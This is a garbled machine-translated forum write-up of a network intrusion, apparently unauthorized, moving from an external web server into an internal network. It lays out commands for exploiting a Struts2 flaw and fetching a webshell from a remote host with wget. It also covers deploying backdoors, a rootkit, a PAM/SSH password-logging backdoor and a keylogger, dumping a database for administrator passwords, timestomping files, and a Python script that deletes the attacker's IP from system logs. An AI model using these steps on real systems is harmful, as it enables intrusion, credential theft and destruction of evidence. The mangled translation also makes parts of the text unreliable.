One penetration test process-from the outside network into the intranet (original)

The first section of this article: Address http://bbs.blackbap.org/thread-7483-1-1.html

recently, the network authority has dropped, need to re-find the entrance into the intranet, with the Phoenix scanner to generate a dictionary to sweep the weak password, human flesh to view the C section on some web, sweep the port, found 13 this machine ran a wingsoft software, found a loophole in the dark cloud, with St2 -005The vulnerability was granted permission to execute commands remotely0x02Enter the border server to perform unset history histfile histsave histzone history histlog;export histfile=/dev/NULL; Export histsize=0; Export histfilesize=0Copy the code so that the system does not record our operation record with the default tool does not go to Webshell, looked under the web directory, chmod777+r/js/added writable permission, still Webshell not go, use Wget-o/web/js/help.jsp www.xxx.com/Shell.txt also cannot write file execution locate Tomcat-User.xmlcat/mulu/tomcat-user.xml Copy Code to find the password after entering the tomcat background, the deployment of the war package to get Webshell, in the future, deploy a word back door several, and modify the file creation time, began to collect information on the Webshell, to prepare for the infiltration of the intranet netstat -tlnp//Check the intranet to connect those ports.Copy Code 10.19.1. About10.19.1.66192.168.1.18410.19.1.150 10.22.1.222   10.22.1.249[Size= -.399999618530273px]10.22.1.249double the configuration file. Find the database at ten.48.14. theNetwork segment connection go in and pull the pants out, look for the administrator's password, turn to 3 admin (* Chen, Liu *, Peng *) record his password, read the next Python-Hnmap-H found that there is a Python environment in the replication code on the insightscan.py to scan the error (However, there is no scanning of eggs), upload Phoenix scanner ready to add a bit of permission, upload error, using the way the file download wget-o/tmp/xx.zip http://Www.baidu.com/xx.zipUnzip/tmp/xx.zip chmod777ff./FF--parameter copy code hint missing dynamic connection pants (Tmux:error whileLoading shared libraries:libevent-1.4. So.2: Cannot open sharedObjectfile:no such file or directory) Baidu for a reason there are generally two, one is the operating system does not include the shared library (Lib*.so.*file) or the shared library version is not correct, in this case, go to download and install on the Internet. Another reason is that the shared library has been installed, but when you execute a program that calls the shared library, the program cannot find the shared library file by default shared library path. Reference Connection: http://www.jb51.net/article/35383.htm0x03Permission Maintenance (1Installing a rootkit-installed application-level rootkit is basically an encrypted NC, with the port root and password configured (2install Pam backdoor record root password local is root permission, we need the local root password, in/etc/Shadow cannot decrypt the case, you can install the PAM backdoor or SSH backdoor record root password to get the PAM version: RPM-qa|grep pam Copy Code reference: http://www.freebuf.com/articles/system/24104.htmlhttp//www.nxadmin.com/system/1199.html(3) Install Keylogerhttps://github.com/dorneanu/ixkeylog/0x04Log Cleanup (1) Cleanup of web logs awk'!/123.123.123.123|111.111.111.111|phpspy.php/'/var/log/httpd/access_log > Temp && MV Temp/var/log/httpd/access_log Copy Code Touch-amt200901231532file name So change the time back, of course, there are lots of tips on how to modify time. LS|xargs Touch-amt200901231532#这句话就可以直接改时间复制代码 (2The system logs are cleaned with a python script of Prince Bull #!/usr/bin/env pythonimport OS, sys, SUBPROCESSDEF banner (): Print" " This isLinux log Clear script \ n Welcome to www.90sec.org\n Python log.py127.0.0.1\ by:mr,prince" "Try: Host= sys.argv[1]        ifLen (SYS.ARGV) <1: Banner Log= ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","Usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]         forLineinchlog:ifos.path.exists (line): Subprocess.call ("sed-i '/%s/d '%s"% (host, line), shell=True) Print"[+]:%s"%(line)Else: Print"[-]:%s"%(line) except Exception:banner () copy code to the XI branch so long, but also for the XI branch to write an article, not to be continued, the intranet has 2 domains, now still in the first domain hovering, still did not get the domain control permission, not to be continued to put ... 

One penetration test process-from the outside network into the intranet (original)